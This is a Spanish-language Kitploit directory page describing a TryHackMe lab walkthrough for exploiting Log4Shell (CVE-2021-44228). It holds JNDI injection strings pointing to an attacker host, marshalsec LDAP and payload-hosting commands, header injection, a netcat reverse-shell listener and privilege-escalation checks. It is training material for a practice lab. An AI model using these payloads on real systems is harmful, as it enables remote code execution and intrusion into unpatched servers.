Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Solar-exploiting-log-4j — Guía paso a paso de TryHackMe para explotar la vulnerabilidad Log4Shell (CVE-2021-44228) y lograr ejecución remota de código y capturar flags. | Kitploit
Herramientas/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónIngeniería InversaExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

Guía paso a paso de TryHackMe para explotar la vulnerabilidad Log4Shell (CVE-2021-44228) y lograr ejecución remota de código y capturar flags.

Ver Repositorio
211hace 5 mesesAún no revisado

🔥 Solar Exploiting Log4j - Walkthrough de TryHackMe

📌 Sala: Solar Exploiting Log4j

Plataforma: TryHackMe Dificultad: Media Tema: Log4Shell (Vulnerabilidad de Log4j)


🧠 Objetivo

Explotar la vulnerabilidad de Log4j (CVE-2021-44228) para obtener ejecución remota de código y capturar las banderas.


🛠️ Herramientas Utilizadas

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Servidor HTTP de Python

🌐 Paso 1: Reconocimiento

🔍 Escanear Objetivo

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Hallazgos

  • Puertos abiertos: 80 (HTTP), otros según la sala
  • Aplicación web con backend basado en Java

🌐 Paso 2: Enumeración Web

  • Visitar la aplicación web en el navegador
  • Interactuar con los campos de entrada (login/búsqueda/cabeceras)
  • Capturar la petición con Burp Suite

💥 Paso 3: Identificar la Vulnerabilidad Log4j

La vulnerabilidad de Log4j permite la inyección JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Si la entrada se registra → la vulnerabilidad existe.


⚙️ Paso 4: Configurar el Listener

Iniciar Netcat

root@kitploit:~
nc -lvnp 4444

Iniciar Servidor LDAP Malicioso (Ejemplo)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Ejecutar el servidor LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Paso 5: Alojar el Payload

root@kitploit:~
python3 -m http.server 8000

Crear la clase Java maliciosa (Exploit.class)


🚀 Paso 6: Disparar el Exploit

Inyectar el payload en el campo vulnerable:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Usa cabeceras como:

  • User-Agent
  • X-Api-Version

🖥️ Paso 7: Obtener una Reverse Shell

Una vez disparado:

  • El objetivo se conecta de vuelta al listener de Netcat
  • Obtienes acceso a la shell

🔐 Paso 8: Escalada de Privilegios (si es necesario)

Comprobar:

root@kitploit:~
sudo -l

Buscar:

  • Binarios SUID mal configurados
  • Archivos con permisos de escritura
  • Trabajos cron

🚩 Paso 9: Capturar las Banderas

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Conceptos Clave Aprendidos

  • Log4Shell (CVE-2021-44228)
  • Inyección JNDI
  • Ejecución Remota de Código (RCE)
  • Reverse Shell
  • Explotación Web
Descargar herramienta